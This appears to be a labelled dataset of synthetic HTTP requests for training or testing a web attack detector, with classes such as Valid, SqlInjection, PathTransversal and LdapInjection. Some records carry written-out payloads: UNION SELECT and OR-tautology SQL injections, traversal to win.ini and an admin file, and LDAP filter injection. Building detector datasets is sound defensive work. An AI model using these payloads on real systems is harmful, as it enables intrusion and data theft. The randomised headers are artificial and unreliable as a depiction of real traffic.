Authorization: NTLM dGRib2d2bXNyOEJ4ZWRGNmNhZXR2YWJiUmVydGdobG4=
Range: 946087-
Referer: /dxtee/zoz2nin.cgi
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 5.7; 1r-og; rv:4.2.6) Gecko/96546584
UA-CPU: PowerPC
UA-Disp: 911,125,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8977x4193
Via: 2.7 www.Oi5oft.png, 8.1 www.aoehlep.jpeg
Transfer-Encoding: identity
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 166 55.10.78.191 "aedstaedriNMcf474i" "Thu, 17 Mar 05 05:00:13 GMT"
X-Forwarded-For: 19.232.169.41
X-Serial-Number: 1852790108043394492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13718
Start - Id: 11515
class: Valid
GET /-W9mCincludeQrhavingHR/JRKAREXZYg4/iWbtNUp0VvMPq4_SsF4/lrkeon0iitp4ef/2LteUleHTEigten2/e5z1EByxOitimQnPi@u/uaieh0iyzlws/o43Ay@SL/IxTdhyelhdoshi7hs/Dt@9HNd/c30fEkc/48uYfQA1@Hu9q.swf?WMq6yX4kAc=lloe&ieya5l=ahvbscriptt%296jnetaustdin+oeeu3n&nsedvcmiahccnel=re&bwrektgkse1iiq=obpNyjgYI1H&P@W4SmMFhM=196514&ulcI7wenO3=sp&4Kcmd51pU=rcp+s HTTP/1.0
Host: 70.92.218.181
Connection: srFet
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7643
Client-ip: 102.26.171.232
Cookie: EJE8KGcOwHw-=nV6mJ5;nnvatN75Ctefln=eHTLfsd perl;asnp05ec=eo;-jP0CMY=a otsuh~-lo snm;i0is3hOeersont=o2erQV
Cookie2: $Version="884"
Date: Mon, 22 Mar 04 15:44:52 UTC
ETag: W/"@jMQA0X.7TuTVQ0Qb"
Expect: nzwti
From: 6o0a8@owhtdaz1a.uk
If-Modified-Since: Mon, 29 Nov 04 11:32:05 UTC
If-Unmodified-Since: Mon, 19 Jul 04 17:54:34 UTC
If-Match: "EsUKyipE7i4ru5NUpn"
If-None-Match: *
If-Range: "mDbeYG4sEFcfmq8m"
Max-Forwards: 001
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: Basic bW9ycGQ6c0U1NnQ=
Range: 778354-142629
Referer: http://aImAme.gov/otban.bin
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.9 (X11; U; Unix 4.0; Lr-2h; rv:1.0.0) Gecko/70193523
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9366x217
Via: 8.4 www.niadO.jpeg, dntT/8.9 182.45.75.158
Transfer-Encoding: compress
Upgrade: El8/1.4, aowwq/9.0, sitt9a/9.8, etn/6.9
Warning: 522 152.136.158.58 "nxxntaane3s" "Sat, 03 Sep 05 20:12:16 GMT"
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 492976
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 11515
Start - Id: 28917
class: Valid
GET /f3VsIPKqpLeLoFhJUe/i_Q6M__Tx-N89aNuaC/n@NlSt3pge-WB9O.EgD0/c2ro/ecrergrraeet/das8AqtphsAosidzrjF/qse5h.htm?oRbthitEidz4lr=sgahtey1S&e3aeettnwm=Fm&nceEaabeuti9=u+&4eba4xp5fsrhp=iwgqrong+oo HTTP/1.1
Host: www.6brfrD.org
Connection: close
Accept: audio/x-wav, audio/*;q=0.1, text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate, gzip;q=0.1
Accept-Language: i-arshotna;q=0.6, o-a3hnCrs, itu-rrhjojnr;q=0.7
Cache-Control: only-if-cached
Client-ip: 46.140.247.81
Cookie: xqcrNra=7223006681;RPthUiAmoo=tettzeerhn
Cookie2: $Version="054"
Date: Fri, 22 Dec 06 03:29:07 UTC
ETag: "pw76QYytEbZj@ySjJu-"
Expect: 100-continue
From: jel1wenc@25eoL.it
If-Modified-Since: Sat, 01 Jul 06 04:15:35 UTC
If-Unmodified-Since: Mon, 14 Jun 04 16:52:09 GMT
If-Match: "_l_NIJXNjId-qfsUIbh"
If-None-Match: *
If-Range: Wed, 25 Apr 07 20:13:27 GMT
Max-Forwards: 7749
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic b2lyY2xlYjpvdG1laXU=
Authorization: Digest nc=94FBA603
Range: 492-,-067,215329-8229
Referer: http://leace.com/agmovm.jpeg
TE: gzip,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 9.2; li-in; rv:8.3.8) Gecko/44715607
UA-CPU: StrongARM
UA-Disp: 219,0393,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 516x1101
Via: HTTP/8.4 www.stbve6nn.jpg:88
Transfer-Encoding: gzip
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 849 www.nnoei.jpeg:1260 "it14qNa9s0atUtej4rn" "Sat, 10 Oct 09 18:20:14 CET"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 4133682407405802626
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 28917
Start - Id: 29111
class: Valid
GET /m0ws9rlwu8enas/EV/pd/ikvtmrSSj2/51ftp1LshutdownN/oRj/5iazBBX901meta/lEpasswdd/%u9.Yt/aZS/wJ2HZm/tor8c-ftpmetaiframepUya.asp?9IIZGT2@zr=5009847&qbnh=ro0nc&aedhblCcldi=0hceo&Alo1ciccdutrnb=reii&oOsus6e=Suro&rgatae9r=0512&eN=0oaadhs0onstcde&hin1l4nYlr1h=393237&tabiwihmetlma=habadminjG&Jtlolyns=tono&agnetEwa=tnqaNApse HTTP/1.0
Host: www.tawuraarn.uk
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 238.223.12.222
Cookie: 1TanT0y2=e3Ez6niad;hneype=sn+apasswdmAethrnph-eueftanda
Cookie2: $Version="6"
Date: Sat, 31 Jan 09 03:01:54 CET
ETag: W/"_zteknEoM7vm83O7Ym"
Expect: 100-continue
From: uSr9xiEn@oae1tnc.st
If-Modified-Since: Fri, 21 Nov 08 23:53:39 UTC
If-Unmodified-Since: Sun, 30 Nov 08 02:24:01 CET
If-Match: *
If-None-Match: "@Cs9_KeKDMv5hv6Ycw"
If-Range: "OlHmlinXDmRs6cUAoV"
Max-Forwards: 796
MIME-Version: 4.3
Pragma: au='fe'
Proxy-Authorization: aiEVod ino2qn=1ud6sw
Authorization: Basic bk4wZW04ZjY6YXNlZW96bg==
Range: 71-
Referer: http://www.hnps.it/nedniat/ilse8e/gtox12e/LgltjzR.php3
TE: deflate,trailers,chunked
Trailer: If-Range
User-Agent: enaneh/4.9.6.2.7
UA-CPU: x86
UA-Disp: 8585,7282,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7767x3879
Via: zmtt/6.6 www.axoNhm.png:40, HTTP/9.4 www.unftt.png, 2.1 www.onnn.htm:02
Transfer-Encoding: compress
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 711 www.heqs.tiff "w6anEbhagmiefnfsan" 
X-Forwarded-For: 6.85.252.74
X-Serial-Number: 1881707
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29111
Start - Id: 42206
class: SqlInjection
GET /vayJ75rb/nnu9/fnsoar/stSrundneh/n2ciooe3HwryrnRlu/ree3hzuTstAld9/gMvD5ip@FC0Pxs-2f5y/hrahWteElYn7ytaoe/no0m./htWHcUb6u/a2/coA.jpg?8FoIBdropBpassthru_Texec@=3lC&ehNTzeaEu=7069802&execL%uco=%27++%29+UNION+++++ALL++++SELECT+++8oS++%2C++++26ns++++%2C++dme0rye++++FROM++++obag+++WHERE++edE0t+++++NOT++++IN++++%28%27lvh%27++++%29+++++AND+nlb6bf+++++NOT++++IN+++++%28+%279hs7ldns%27+%29+++AND++++%27%27%3D+%27&bUNSn62cp=nsrg&qe4desnCEt=66924&leusaofbrcem=hdl&ertaiiix=%7C%27bgsoundae6rotuhneE+u HTTP/1.1
Host: 240.190.29.41:0
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1257;q=0.5, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 189.179.253.21
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="83"
Date: Sun, 15 Feb 09 09:18:48 GMT
ETag: W/"fn7bj1SqWuSxNn3lC"
Expect: 100-continue
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: *
If-None-Match: *
If-Range: "_h1KHJSxLwaeJm-ZMRm"
Max-Forwards: 7
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: tohms oro1h=3Duzsaa
Range: 8473-303,-227666,770360-
Referer: http://oEd2yeFh.gov/see6c/eihEslo/TkwoUgr2.msf
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Accept
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 8.8; H4-ut; rv:8.0.7) Gecko/80895967
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 451x3766
Via: 9.0 www.e1ia.gif:773, 6.2 www.tirt6ht.htm
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 11545231207
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42206
Start - Id: 36214
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.0Rtnx.com
Connection: cltcI
Accept: text/plain
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: lcnedp-h1oaehhe, etaO-32i, Ocgcteo-oa2lzhe;q=0.8
Cache-Control: no-store
Client-ip: 57.19.106.255
Cookie: coeiuaSo=cirjmjD9gzfw;f6=HhtaccesmT%]lib~l(tbE;Lh9P0aZJi=219391923;nasNdhnrsa=3:roI
Cookie2: $Version="32"
Date: Tue, 13 Nov 07 06:20:50 UTC
ETag: "GO2S.faufqbFl7gf_ODS"
Expect: e86z=ehdsOdp;uenhi1
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Match: *
If-None-Match: *
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 58
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dDhtZW9ubThvZWFlbW1pZW1IZVRoMXRlb1JlYnRyaUhhb2U3aWg4UlRoZXF0cEU=
Authorization: NTLM bnBhSG9heGkzaGxvZUVvN293Y3o2ZW1ocEVyaHRheW90dG4xdGVlaXBMNHQ=
Range: 183-
Referer: http://www.tLIipxb.ch/niqSlcse/9etsnatp/sdoexAS.css
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.5 (compatible; mxtmouo; Linux i586; rn7md2e)
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: 5.8 110.84.189.241, HTTP/9.2 1.12.74.59
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: -------------------------------

null

End - Id: 36214
Start - Id: 42251
class: SqlInjection
GET /d557nwi5eY8/rdh3e/seofx/lhSViMZwf7v3fdab/Igeogzjii0be/6h/sm/57yJzGX_X8T/rB8j_X90PQFgV0/0rd0lwoad/Enc6n2i6etn8uyim7.cgi?q.RQ0.passthruPH3=4496039&oeeUiijat9=lx6t-acceptHublv&bc4ev1dafs4i4l=OR+++%27myhrd%27+++++%3D+++++%27+++++%27 HTTP/1.0
Host: 22.148.241.73
Connection: close
Accept: image/*, text/plain;q=0.6, audio/basic;q=0.9
Accept-Charset: isiri-3342, windows-1252
Accept-Encoding: *
Accept-Language: c-eunfnux, yeuh11-irri4eb
Cache-Control: no-store
Client-ip: 164.216.181.230
Cookie: eaergxsqesoL=31
Cookie2: $Version="400"
Date: Thu, 11 Feb 10 03:44:31 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: ppnuhf@cKraaqblss.ch
If-Modified-Since: Sat, 17 May 08 16:55:56 GMT
If-Unmodified-Since: Tue, 14 Jul 09 08:21:23 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 11 May 05 22:29:57 UTC
Max-Forwards: 801
MIME-Version: 7.5
Pragma: atdd=eeb
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM M3RpcGVlblRlY25ybjN1aW5lRWhpdm5zZm9FOTdlaHRu
Range: 4539-14148,-19,934-
Referer: /sfnM3hr.php4
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 0.2; wu-to; rv:0.8.9) Gecko/31210942
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: HTTP/4.4 www.thyttn.html, bmseTe/3.4 www.nois.jpeg, 0.8 www.oOob2e.jpeg:7299
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42251
Start - Id: 20149
class: Valid
GET /aqGWStNh9uat/s.svCKb0Gj409zqtqF/tdle3ns/lwc3oKD5EadFdwZ/bCKWikIGsn96E/vc.0wcvJ7cU0YK1RH/selecteZRP.dimgbinWJ/S3iIqdocumentegJws.mdb? HTTP/1.1
Host: 233.57.186.70
Connection: arzAues
Accept: */*
Accept-Charset: euc-tw, iso-8859-8-i, euc-tw;q=0.5, iso-8859-6, koi8;q=0.3
Accept-Encoding: 
Accept-Language: mvewate-gelfebwc;q=0.1, 5q2tDt0-e;q=0.5, eceui-tui0o3;q=0.4
Cache-Control: max-age=94358
Client-ip: 214.150.98.24
Cookie: oifGE=9ro Sale
Cookie2: $Version="43"
Date: Sun, 22 Jul 07 11:25:56 UTC
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: lsdoo
From: sb62@aupq5s0rh.st
If-Modified-Since: Sun, 19 Nov 06 11:07:04 GMT
If-Unmodified-Since: Sun, 31 May 09 03:45:19 CET
If-Match: "wGkeGl2UjyUDMon5"
If-None-Match: *
If-Range: Fri, 14 Jul 06 12:30:43 CET
Max-Forwards: 3540
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: srrnsA krEeR=Tsg3ode
Authorization: Digest username="aodtd"
Range: -04261
Referer: http://www.stAfo.fr/eeuh/norv/4lnx.cfm
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/4.5 (Windows; U; Win98 5.6; 8o-Ie; rv:3.7.8) Gecko/05645180
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: HTTP/1.5 www.arncNefb.shtml, FTP/9.8 www.ahdefoqs.gif
Transfer-Encoding: gzip
Upgrade: hnPta/7.8, tro/4.6, hwu/0.0, nlnfh8/7.1, jh3tT/8.7
Warning: 965 13.56.207.189 "8oeegdte" "Wed, 18 Feb 04 20:29:21 GMT"
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 1787908981902267643
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20149
Start - Id: 10942
class: Valid
GET /obp.Sgti3FWn/.WthMtmHCbodyOT/D2jL/yqiIwT/Kboot.ini7Ws4/nLdkaOjP/ds/sP.zo@gRHW/bodyCm/osrb.html?igsiersr=E0dO7home&eaoei5e9ys=nlQvsxl&CS4E0275=4&wewuoisen=nP%40l6xYw&uhsujusar3hceeU=i&icmrfo32ns7e=5&erro=64756855 HTTP/1.0
Host: 204.212.179.255:80
Connection: nifiitet
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rrgseh6-utaaon, xtzeae-moem4oA, O62naas-xrnp3, tco-eeoEao4, wii0mi-29ae;q=0.6
Cache-Control: max-stale
Client-ip: 114.65.2.162
Cookie: resnorsakyole=nbtt31LaRtsnu;auun=42;vckPya_-REZ2=mrkwooaaheeu<;yuu=200672678;hai5wp6aj1=sstshetuEemses;ei2ldnrg1mmraR=oty
Cookie2: $Version="384"
Date: Tue, 24 Feb 09 17:45:42 UTC
ETag: "aUP_cTg21PUfp9J"
Expect: 100-continue
From: teehrre@wibas.it
If-Modified-Since: Mon, 30 Jan 06 10:46:49 UTC
If-Unmodified-Since: Sat, 10 Feb 07 05:57:16 UTC
If-Match: "a7.1FrOabjVCNrK2fqhT"
If-None-Match: *
If-Range: "YmOS393Fx89WCsrc"
Max-Forwards: 69
MIME-Version: 6.9
Pragma: eo=ihu
Proxy-Authorization: NTLM bmlhNHIybU5memFNZXZJeHFhcGFuY2ZlYXQybkVlQ3lyc3N0NXl0b2VlRXJlaA==
Authorization: NTLM b3lpSGFkcnNrbHIwbXRwbmdZZWFkb21lZXhpcWhlZHNuMmVyZUVybzFjdGVvbQ==
Range: -72,78634-
Referer: /8ethie/igar/hmrra/nIt7ett.gif
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: n9JFaJVV http://www.sei7bhee.uk
UA-CPU: PowerPC
UA-Disp: 3789,454,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5309x7001
Via: 6.1 209.54.173.21, 6.7 189.77.132.157
Transfer-Encoding: 3abtG; ondt6c=eberiat
Upgrade: ocou/9.0, etdase/9.0, hnh/9.3
Warning: 917 173.28.222.9 "HHlwrlufhgiWi" "Tue, 01 Feb 05 01:45:23 GMT"
X-Forwarded-For: 213.119.25.206
X-Serial-Number: 847206508501943209
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10942
Start - Id: 6026
class: Valid
POST /upaa54O6lew.js? HTTP/1.0
Content-Length: 168
Content-Language: Mcboot5u,rTOi
Content-Encoding: identity
Content-Location: /s70am.gif
Content-MD5: emRhcmdlbWV2OXBlbUk2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 20:36:22 GMT
Last-Modified: Fri, 15 May 09 01:16:35 CET
Host: www.5eoe1w6rX.uk:8872
Connection: nowbx
Accept: video/*, audio/x-wav;q=0.4
Accept-Charset: cp-950;q=0.3, iso-8859-15;q=0.6
Accept-Encoding: 
Accept-Language: acTt4-n, epyaz5i-it;q=0.9, r-s4la
Cache-Control: max-stale=832
Client-ip: 84.158.76.183
Cookie: fsen=qhdivta;ewi0fNm=Cwak
Cookie2: $Version="251"
Date: Fri, 31 Jul 09 19:22:12 CET
ETag: "sLRkHI8O1J0ET79oSGG"
Expect: 100-continue
From: otmtez@uns3et.be
If-Modified-Since: Thu, 27 May 04 04:06:45 UTC
If-Unmodified-Since: Sun, 16 Mar 08 18:04:56 GMT
If-Match: "CxCdqGl99E4hEox.h"
If-None-Match: "ydqR2i5vIcSgk.ixH9KJ"
If-Range: Sun, 17 Dec 06 10:42:34 UTC
Max-Forwards: 066
MIME-Version: 1.5
Pragma: lpWehic='erPsJf'
Proxy-Authorization: NTLM aTl5RWV0Z3dvYnBjb29lcm9pZWduZUxpdGt0aW5hZUlUeW5SaGVvbkU3YWI=
Authorization: Basic dnRtc2FpQzg6YWF1ZGRjaA==
Range: -38104,-6
Referer: /roT7/relf/sfeheo.swf
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: wgAj25t http://www.suor.net
UA-CPU: PowerPC
UA-Disp: 653,9690,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3798x773
Via: 6.4 227.240.154.165
Transfer-Encoding: identity
Upgrade: ctdT90/6.6, ehttn/1.4, ath/2.3, rdties/0.0, wtnsiW/6.4
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 181.252.29.163
X-Serial-Number: 1285901452667782524
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

AnAntfa=hn5&oNtoun1tmjphsnv=50&hnctgnlfiyeahf=&libexec=ce$saEscript%Nsr -4&rSnencvriueminq=eJ.n-iY&ugsjebnoicw0=31714&edwz=eteg'o+sam0processing-instruction

End - Id: 6026
Start - Id: 11195
class: Valid
GET /X-processing-instructionbetweenN.js?x3m4a=otdq&YjGFlrIl6D=ajbeu&rlinnsojemeamee=wb4n+e6haNeeta%5Blil&eWttte32sat=23n4tgteqstiihil&eero6u=n&neuosba=5833&3y=Tgd%3Eufft3+dt+fT%29+esh&e0Atdknr3c4aoLi=+f&ndOuairb477f4=ertn&posORohtohrjekm=sadlhmhr&iettspans=ntsfyhnphatte&ieehueaalXeE=ircGbrinozcylmll&%upjsamKqcStelnetls=nirni HTTP/1.1
Host: 41.199.208.155
Connection: keep-alive
Accept: application/zip, application/*, image/jpeg;q=0.4
Accept-Charset: us-ascii, windows-1251;q=0.2, iso-8859-1;q=0.0, euc-jp, iso-8859-2;q=0.6
Accept-Encoding: deflate, deflate, deflate;q=0.5, identity
Accept-Language: *;q=0.6
Cache-Control: min-fresh=9
Client-ip: 104.235.20.131
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="56"
Date: Fri, 05 Sep 08 22:05:49 GMT
ETag: "52FqlgQgG..s.ueD"
Expect: 100-continue
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 03 Apr 04 21:22:46 GMT
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: *
If-None-Match: "AhOn-XxNDvD00GS"
If-Range: *
Max-Forwards: 81
MIME-Version: 3.9
Pragma: pgrgN=lhvy2o
Proxy-Authorization: Digest cnonce="irua"
Authorization: NTLM OGdyc2VkdGlqYWhyTGNVcWU1NGEzc3dnb2g1dXJjZFRscm51aWVndGt2czFlZ3dp
Range: 9-8943
Referer: http://www.ExUi.st/ndin/etiecs/asc1.wav
TE: trailers,trailers
Trailer: Warning
User-Agent: ewuIc (sqdsh4.2mz; rySXOz; hwzWwY2CU; s2.WY5tpE)
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1597x0250
Via: 7.1 www.uoetdo4f.htm, 9.4 46.102.241.10, 9.8 216.237.122.11
Transfer-Encoding: gzip
Upgrade: aev/1.5, 3me/3.4, 5bni/1.4, int/8.3
Warning: 852 31.192.170.99 "caa2sqir" "Tue, 27 Nov 07 24:53:47 UTC"
X-Forwarded-For: 133.197.157.12
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11195
Start - Id: 44805
class: PathTransversal
GET /atmitxehmA/tecsveaIolepn/a3vhot6Rlthd.php3?dy=..%2F..%2F..%2Fma%2Fadmin.txt HTTP/1.1
Host: www.4f9zEulm.net:41
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-2022-jp;q=0.1, utf-7;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: de3s-eet6ilf;q=0.2, Oone-e;q=0.2, owj1f-gto4i6bt, 1ba-lsu
Cache-Control: Loo='at8se'
Client-ip: 162.199.90.42
Cookie: oaa=tstTan8foMr;byo7lp=-uot
Cookie2: $Version="8"
Date: Tue, 05 Jun 07 20:23:55 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 3wznn
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 19 Dec 04 01:55:59 UTC
If-Unmodified-Since: Mon, 28 Apr 08 19:47:53 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Dec 04 21:14:45 CET
Max-Forwards: 60
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic ZWVlYmloMTpvYWxyb2Yx
Authorization: Basic c2FpYTptdGExUmxv
Range: -970
Referer: http://le9ntrsi.uk/el31Ln.jpeg
TE: deflate,deflate;q=0.5,chunked;q=0.1
Trailer: Pragma
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 3.5; ak-ah; rv:8.4.6) Gecko/57571288
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: HTTP/7.6 233.102.203.220:19, FTP/2.0 136.172.22.180:83149
Transfer-Encoding: identity
Upgrade: slw/7.3, uta/7.7, liwd/0.4, n1ee/7.5, Y3s/1.6
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 232.35.194.78
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44805
Start - Id: 37519
class: LdapInjection
PUT /ra/caZjhavingaWXq7/o1tgnksAerE6F/shkow7qinnmO/rp5_l3A-hOyj7B@Y.css? HTTP/1.0
Content-Length: 321
Content-Language: ptlMi6,n7ldgzud,tazWc
Content-Encoding: deflate
Content-Location: http://4rMNi5.cz/eutsm/3ir7tT/rrdnld8t.jsp
Content-MD5: OXQxY3RlYWxjZEFrc3Jobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 08:08:37 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: 35.173.241.198:41
Connection: pyzg
Accept: video/*, text/html
Accept-Charset: koi8
Accept-Encoding: *;q=0.6
Accept-Language: ncroJe-nCtluv;q=0.6, iqai29-e7i;q=0.9
Cache-Control: min-fresh=060
Client-ip: 244.64.43.249
Cookie: N84dnnhthangB=73405;pafaPeIrpau=ead;oiEho4ete=4095106;hniAdP1oeu=eFfin5l;oTar=hf
Cookie2: $Version="961"
Date: Thu, 06 Jul 06 09:23:48 CET
ETag: "u34qWBiJNpxKq9A"
Expect: 100-continue
From: tisu@inUeyeh.org
If-Modified-Since: Wed, 27 Apr 05 12:30:48 CET
If-Unmodified-Since: Tue, 05 Dec 06 13:53:45 CET
If-Match: "dNyeVjFdsZkDQO.ri-I9"
If-None-Match: "oXG7Ni5kh-By9P53TQ"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: NTLM NWkxZXN3eXNodGFpb25zTnJnbG5UZTdyaEVhd3Jhc3lyeWVJ
Authorization: Basic bHI4djoxYmJyYQ==
Range: 0516-7855,069180-,334-
Referer: http://ghdee.de/hDdoTtdw/qoah.mdb
TE: deflate,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/0.7 (compatible; MSIE 6.4; SunOS sun4u; iespetei9; asdsEhke; ibwyn)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 2665x9772
Via: 6.4 95.218.183.57, 9.7 104.205.119.33:0
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

yscssqde=521097&omlnita5kces=y8rRHCUVA&ioze=i0XuS&x8Nu=awp-Tm&qLaalqqNrzdl=?rca&hxieezhfSawez=)  ( |    (siry=Bh*)&WkZbupPGCstdin3=n jhii:bgwn66il&6h4dso=rnrtaiSg~sns4&esnbiltt=0407&iyroaaoslyah=2(3mlaEm4b$iui&soHtpAepclvra3E=nlHdl&tclpogeto5=nn es|iIhtaccesr&.psn2vsx=804613&gOrnmiYaot=qoVK2R5RTY

End - Id: 37519
Start - Id: 15432
class: Valid
GET /H1h/ez/1tawlye/71ooigieqdw6/ro1hc1nyanitrott/eese8iesnbvlshRLE/utvctod6orrypTefnte.png?al1ffhemnh=%3Bta7H&rharnumih=aYCqh1CM8IK0 HTTP/1.1
Host: 198.48.113.69
Connection: close
Accept: video/quicktime, audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: Eha5mcii-mxta39b5;q=0.9, maai4-loht
Cache-Control: no-store
Client-ip: 225.80.59.188
Cookie: zntcqi5iix=skwR
Cookie2: $Version="494"
Date: Sat, 10 Sep 05 24:56:54 UTC
ETag: W/"XrIK5Z@E08iUctci2yO"
Expect: o00to=jrir5a;telilZd
From: hreEo@mhtthLrava.org
If-Modified-Since: Mon, 13 Jul 09 17:28:05 CET
If-Unmodified-Since: Fri, 26 Sep 08 16:28:14 CET
If-Match: ".xT4_p8NFyab_Ywg@zA1"
If-None-Match: "Xy@sOUH-XNFMJCMx"
If-Range: "HjtHlmiQS3X7bbnlBN4n"
